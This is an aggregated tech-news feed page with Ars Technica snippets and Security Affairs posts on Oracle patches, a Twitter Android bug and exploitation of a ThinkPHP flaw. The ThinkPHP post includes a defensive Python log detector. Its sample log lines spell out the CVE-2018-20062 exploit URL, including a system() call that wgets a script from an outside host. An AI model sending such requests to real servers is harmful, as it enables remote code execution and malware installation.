News & Updates

Actually, I think that was a popular timepiece style when the site first started. (credit: Aurich Lawson / Getty Images)

It’s true—Ars Technica is in the process of turning 20 years old throughout 2019. If you’ve ever looked at the whois info, our official birthday hits on December 29. But Ars was really birthed all throughout that first year, as Editor-in-Chief Ken Fisher (err, Caesar) and his fellow computer prosumers figured out how to start the most comprehensive PC enthusiast outlet around. “Our love for the PC is gonna lead us into bad, bad things like NT, Linux, and BeOS content under the same roof,” as the original Ars Mission Statement noted. “Please don’t report us!”

Since then, well, Ars has definitely expanded. You can find anything from LARPing to archaeology industry trends alongside the latest Linux review on the site today. But throughout these past two decades and the site’s numerous evolutions, Ars still feels like it has stuck with the ethos of that initial public declaration: “having fun, being productive, and being as informative and as accurate as possible,” as Caesar put it.

So to cap off this week (itself likely a small start to what will inevitably be numerous trips down memory lane during our 20th anniversary year), we recently polled the Ars community—aka, staff and readers—to find out what folks consider some of the site’s greatest hits. The first batch of story suggestions is below, but don’t be shy about starting a second list in the comments.


Source: http://feeds.arstechnica.com/arstechnica/index/

Roscosmos head Dmitry Rogozin is photographed in October, 2018, after the launch failure of a Soyuz-FG rocket. (credit: Alexei Filippov/TASS via Getty Images)

After an American Apollo and Soviet Soyuz spacecraft docked in orbit during the height of the Cold War, in 1975, the two leading space powers gradually worked more and more together on civil space activities. Over time, they forged a successful and, among astronauts and engineers at least, even a comfortable bond. But of late, that bond is fraying, and long-term it may unravel entirely.

The most immediate issue involves Dmitry Rogozin, appointed to lead the Russian space corporation Roscosmos in May 2018. Overtly political, Rogozin shares Vladimir Putin’s antipathy toward the West. Following the Crimean crisis in 2014, Rogozin was one of seven Russian officials sanctioned by the Obama administration. In response, he taunted NASA, which relied then (and still does) on Russian Soyuz spacecraft to reach the International Space Station.

“After analyzing the sanctions against our space industry, I suggest to the USA to bring their astronauts to the International Space Station using a trampoline,” Rogozin, then a deputy prime minister of Russia over defense and space, tweeted in Russian at the time.


Source: http://feeds.arstechnica.com/arstechnica/index/

Michael Burnham is all of us. (credit: CBS)

In many ways, this season felt very much like a much-needed reset from the previous one. The Klingon war is over, and the Federation is consumed by a new scientific pursuit: mysterious red bursts of light that have appeared across 30,000 light years.

The scene that really drove home the reset was the formal roll call, where our bridge characters say their names—really, directly to the audience.

It’s still baffling that we went an entire season without knowing most of the bridge crew’s names! Yes, we sort of got to know a handful of characters, but there are regular faces that we’ve seen many times on the bridge. If, like the other shows, the bulk of each episode happens in the nerve center of the ship, it would help to know who we’re interacting with.


Source: http://feeds.arstechnica.com/arstechnica/index/

Oracle has released its first Critical Patch Update advisory of 2019. It addresses a total of 284 vulnerabilities, 33 of which are rated “critical”.

Let’s take a closer look at some of the vulnerabilities fixed by this advisory.

The advisory fixes CVE-2016-1000031, a Java deserialization flaw in Apache Commons FileUpload that allows remote code execution (RCE). The bug was found by Tenable researchers back in 2016, but it drew renewed attention in November 2018, when the Apache Struts project warned users that Commons FileUpload is the default file upload mechanism in Struts 2 and needed to be upgraded separately.

Within Oracle’s portfolio the bug affected the Oracle Communications Applications (OCA) Diameter Signalling Router and Communications Services Gatekeeper, as well as Financial Services Analytical Applications Infrastructure, Fusion Middleware MapViewer, and several Oracle Retail components.

A deserialization vulnerability in Apache Log4j, tracked as CVE-2017-5645, impacted Oracle’s Converged Application Server – Service Controller, the OCA Online Mediation Controller Service Broker, the WebRTC Session Controller, the FLEXCUBE component in Oracle Financial Services Applications, the Fusion GoldenGate application adapters and SOA Suite, and also a Sun tape library component.

A separate flaw in the Codehaus-era versions of Groovy affected OCA Unified Inventory Management.

The advisory also fixes CVE-2018-11776, the Apache Struts 2 namespace-handling RCE, in the OCA Communications Policy Management component. This issue was exploited in the wild in 2018 by threat actors to mine cryptocurrency.

Oracle also addressed an arbitrary file upload flaw in the jQuery File Upload plugin (CVE-2018-9206) in the OCA Services Gatekeeper; the same bug impacted Primavera P6 in the Construction and Engineering Suite and Siebel CRM.

Another bug fixed by Big Red affected the Performance Management component of Oracle E-Business Suite and is tracked as CVE-2019-2453:

“Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Performance Management,” reads the description provided in the advisory.

“Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Performance Management accessible data as well as unauthorized access to critical data or complete access to all Oracle Performance Management accessible data.”

Oracle addressed CVE-2016-4000, a deserialization flaw through which Jython provides a vector for arbitrary code execution; Jython is used by the Oracle Enterprise Manager platform, Oracle Banking Platform, and the Utilities Network Management System.

The list is very long. It also includes a patch for a denial-of-service flaw in Apache Derby as used in WebLogic Server (CVE-2015-1832) and an RCE bug in the Spring Framework as used by Oracle Tuxedo and the Sun Tape Library ACSLS component.

People interested in the full list could visit the following address:

https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html


Pierluigi Paganini

(SecurityAffairs – hacking, critical patch advisory)

The post Oracle critical patch advisory addresses 284 flaws, 33 critical appeared first on Security Affairs.

Source: Security affairs

The US Supreme Court is shown on the day of the investiture ceremony for new Supreme Court Associate Justice Brett Kavanaugh on November 8, 2018 in Washington, DC. (credit: Mark Wilson / Getty Images)

The legal system is often a confounding place, where disputes are adjudicated—it’s a world full of jargon that we journalists try to explain as best we can. And over the last two decades, legal cases have remained a fixture on Ars Technica.

We’ve brought you endless news of initial criminal or civil complaints in that time. And in the most important cases, Ars has followed them, blow by blow, through various motions. We sat in every session for the criminal trial of Silk Road mastermind Ross Ulbricht and took a similar approach to the API patents saga of Oracle v. Google, for instance.

Just this week, Ars sat in the courtroom as Defense Distributed and the State of New Jersey argued over legal jurisdiction and matters of free speech intersecting with future technology. It echoes back to our site’s legacy of watching the march of technology and innovation directly intersect with an evolving legal system. It has been nearly 20 years since we covered Microsoft’s infamous antitrust battles around the turn of the century, and those battles have since become the subject of CNN’s decade documentaries.


Source: http://feeds.arstechnica.com/arstechnica/index/

A Falcon 9 rocket launches from Vandenberg Air Force Base. (credit: Aurich Lawson/SpaceX)

Welcome to Edition 1.32 of the Rocket Report! As we get deeper into the new year, the launch business is starting to heat up, especially among the smaller rockets. Companies are eyeing launch sites, securing launch contracts, and scrambling on development of their rockets. This is simply going to be a huge year for small-sat launchers, and we’re going to do our best to stay on top of everything.

As always, we welcome reader submissions, and if you don’t want to miss an issue, please subscribe using the box below (the form will not appear on AMP-enabled versions of the site). Each report will include information on small-, medium-, and heavy-lift rockets as well as a quick look ahead at the next three launches on the calendar.

Relativity Space to launch from historic Florida site. The company that aspires to 3D print almost the entirety of its rockets has reached an agreement with the US Air Force to launch from historic facilities at Cape Canaveral Air Force Station in Florida. Relativity Space said Thursday it has a multiyear contract to build and operate its own rocket launch facilities at Launch Complex 16, Ars reported.


Source: http://feeds.arstechnica.com/arstechnica/index/

Despite Google’s repeated efforts to keep malware out of the Play Store, shady apps still manage to fool its anti-malware protections, get listed, and infect Android users.

Two such Android apps have recently been spotted on the Google Play Store by security researchers with the Trend Micro malware research team, infecting thousands of Android users who have


Source: http://feeds.feedburner.com/TheHackersNews

For teens, digital technology is good. Or bad. Or maybe neutral? (credit: SimpleTexting.com)

In South Korea, people under the age of 16 can’t play online games between midnight and 6am. The UK Parliament has launched an official inquiry into “the impact of social media and screen use on young people’s health.” Meanwhile in the United States, the Wait Until 8th campaign asks parents to delay giving their children a smartphone until they’re in eighth grade. Worry about kids and technology is rampant—so have smartphones, in fact, destroyed a generation?

A paper published in Nature Human Behaviour this week answers that question, often differently, thousands and thousands of times. Researchers Amy Orben and Andrew Przybylski took three huge datasets and threw every possible meaningful question at them. In part, their analysis is an illustration of how different researchers can get wildly different answers from the same data. But cumulatively, the answers they came up with indicate that tech use correlates with a teeny-tiny dent in adolescent well-being—and that there’s a big problem with big data.

High numbers don’t necessarily mean high quality

Studying small numbers of people, or rats, or trees can be a problem for scientists. Comparisons between small groups of subjects might miss a real finding or luck out and find something that looks like a pattern but is actually just noise. And it’s always tricky to generalize from a small group to a whole population. Sometimes small is the only sort of data that’s available, but some research disciplines have had the recent(-ish) boon of gigantic, rich datasets to work with.


Source: http://feeds.arstechnica.com/arstechnica/index/

A bug in the Twitter app for Android may have exposed users’ protected tweets, the social media platform revealed on Thursday.

The bug affects the “Protect your Tweets” option under the account’s “Privacy and safety” settings, which restricts viewing of a user’s posts to approved followers.

People who used the Twitter app for Android may have had the protected tweets setting disabled after they made some changes to account settings, for example after a change to the email address associated with the profile.

“We’ve become aware of an issue in Twitter for Android that disabled the ‘Protect your Tweets’ setting if certain account changes were made,” reads the security advisory published by the company.

“You may have been impacted by this issue if you had protected Tweets turned on in your settings, used Twitter for Android, and made certain changes to account settings such as changing the email address associated with your account between November 3, 2014, and January 14, 2019.”

The bug was introduced on November 3, 2014, and was fixed on January 14, 2019. Users of the iOS app or the web version were not impacted.

Twitter has notified impacted users and has turned “Protect your Tweets” back on for them if it was disabled.

“We are providing this broader notice through the Twitter Help Center since we can’t confirm every account that may have been impacted. We encourage you to review your privacy settings to ensure that your ‘Protect your Tweets’ setting reflects your preferences,” continues the advisory.

Twitter recently addressed a similar bug: in December the researcher Terence Eden discovered that the permissions dialog shown when authorizing certain apps to access Twitter could expose direct messages to the third party.

In September 2018, the company announced that an issue in the Twitter Account Activity API had exposed some users’ direct messages (DMs) and protected tweets to the wrong developers.

Twitter is considered one of the most powerful social media platforms, and it has been used in multiple cases by nation-state actors as a vector for disinformation and propaganda.

In December Twitter discovered a possible nation-state attack while it was investigating an information disclosure flaw affecting its platform.


Pierluigi Paganini

(SecurityAffairs – Twitter app, Android)

The post Twitter fixed a bug in its Android App that exposed Protected Tweets appeared first on Security Affairs.

Source: Security affairs

Threat actors in the wild are leveraging a recently disclosed flaw in the ThinkPHP PHP framework to install cryptominers, card skimmers, and other malware.

Multiple threat actors are exploiting a recently disclosed remote code execution vulnerability (CVE-2018-20062) in the ThinkPHP framework.

The flaw was already addressed by TopThink, the Chinese firm that develops the framework, but security expert Larry Cashdollar of Akamai’s Security Incident Response Team has now observed active exploitation of the flaw in the wild.

Cashdollar was investigating a recent Magecart campaign when he came across a new strain of malware.

“While investigating the recent Magecart card skimming attacks, I came across a payload I was not familiar with. Further research into it led me to discover that in December a researcher disclosed a remote command execution vulnerability in ThinkPHP, a web framework by TopThink,” reads the analysis published by the expert.

“The developers fixed the vulnerability stating that because ‘the framework does not detect the controller name enough, it may lead to possible “getshell” vulnerabilities without the forced routing enabled.’”

According to Cashdollar, the attackers are using relatively simple techniques to trigger the issue: a single line of code is enough to scan for vulnerable hosts.

Once a vulnerable host is found, the attackers use publicly available exploit code to run commands on it and install a variety of malicious payloads. Cashdollar said that in one case, threat actors exploited the flaw to deliver a variant of the Mirai bot.

“There are multiple actors abusing this flaw to install everything from a Mirai like botnet to Microsoft Windows malware. ” continues the post.
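The scanning and exploitation described above leave a recognisable shape in web server access logs, because the attack travels in the ThinkPHP `s=` route parameter. The following Python detector is an added example for this page, not code from Akamai, Cashdollar, or the ThinkPHP project. It parses Apache combined-format log lines, extracts the route, and flags any route segment that is not a plain identifier (a regex modelled on the controller-name check the upstream fix added, paraphrased here as an assumption) or that invokes `invokefunction`, then grades the hit as a scanner probe or a live command execution depending on which PHP function `vars[0]` names. The log lines, IP addresses, timestamps and URLs are constructed; the exploit URL shape is the widely published one for CVE-2018-20062.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache "combined" format); not captured traffic.
# Line 1 is the typical scanner probe (calls md5 on a marker string), line 2 is a live
# exploit that fetches and stages a dropper, lines 3 and 4 are benign ThinkPHP routes.
SAMPLE_LOG = r"""
192.0.2.10 - - [19/Jan/2019:10:01:02 +0000] "GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.11 - - [19/Jan/2019:10:02:15 +0000] "GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://203.0.113.5/x.sh%20-O%20/tmp/x.sh HTTP/1.1" 200 1024 "-" "python-requests/2.18"
198.51.100.7 - - [19/Jan/2019:10:03:40 +0000] "GET /index.php?s=index/user/login HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.8 - - [19/Jan/2019:10:04:01 +0000] "GET /index.php?s=index/Index/hello HTTP/1.1" 200 128 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Assumption: modelled on the controller-name check ThinkPHP added in its fix. A route
# segment must be a plain identifier, so a namespaced class such as "\think\app" is rejected.
SAFE_SEGMENT_RE = re.compile(r"^[A-Za-z](\w|\.)*$")

# vars[0] naming an OS-command function means a live attack; md5/phpinfo-style calls are
# the harmless probe scanners use to confirm the flaw before exploiting it.
SHELL_FUNCS = {"system", "exec", "shell_exec", "passthru", "popen", "proc_open"}
PROBE_FUNCS = {"md5", "phpinfo", "print_r", "var_dump"}


def controller_name_is_safe(name: str) -> bool:
    """True if the route segment is a plain identifier (no backslashes, slashes, etc.)."""
    return bool(SAFE_SEGMENT_RE.match(name))


def parse_line(line: str):
    """Split one combined-format line into fields and a parsed query-string dict."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # parse_qs percent-decodes values, so %20 in the exploit command becomes a space.
    rec["query"] = parse_qs(urlsplit(rec["target"]).query, keep_blank_values=True)
    return rec


def classify(query: dict):
    """Return (kind, detail) if the request matches the CVE-2018-20062 pattern, else None.

    Only GET-style exploitation is visible here; variants that carry the payload in a POST
    body are not recorded in a standard access log and need request-body logging or a WAF.
    """
    route = query.get("s", [""])[0]
    bad_segments = [p for p in route.split("/") if p and not controller_name_is_safe(p)]
    if not bad_segments and "invokefunction" not in route.lower():
        return None
    func = query.get("vars[0]", [""])[0]
    args = query.get("vars[1][]", [])
    if func in SHELL_FUNCS:
        return "command-execution", " ".join(args)
    if func in PROBE_FUNCS or query.get("function", [""])[0] == "call_user_func_array":
        return "probe", func
    return "route-injection", route


def scan_log(text: str):
    """Run the classifier over every line and return the flagged requests in order."""
    findings = []
    for line in text.strip().splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        verdict = classify(rec["query"])
        if verdict is None:
            continue
        kind, detail = verdict
        findings.append({"ip": rec["ip"], "ts": rec["ts"], "kind": kind, "detail": detail})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']:<14} {f['kind']:<18} {f['detail']}")
```

Run against a real log, the `command-execution` hits give you the staging URLs and dropper paths to block and hunt for, while the `probe` hits are the scanner traffic the article describes; either kind against an unpatched host is a reason to assume compromise rather than just patch.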

Analysis of the samples collected over the previous seven days revealed that the majority of the attacking IP addresses are in the Asia Pacific region, where the ThinkPHP framework is most popular.


Cashdollar confirmed that threat actors are actively scanning systems across the world.

To secure a deployment, update the framework to a release that contains the fix (ThinkPHP 5.0.23 or 5.1.31 and later) and review web logs for the route-injection pattern, since exposed instances were being scanned within days of the disclosure.

“There is so much attack traffic, and so many ways to hide, criminals no longer worry about the tracks they’ve left behind. The goal now is to get command execution as any user, on any type of system, to either spread a botnet, distribute malware, or mine cryptocurrency.” concludes the expert.

“We will see more cross-pollination of command execution vulnerabilities in web apps, enterprise software, and IoT devices being used against multiple target platforms.”


Pierluigi Paganini

(SecurityAffairs – hacking, ThinkPHP)

The post Attacks in the wild leverage flaw in ThinkPHP Framework appeared first on Security Affairs.

Source: Security affairs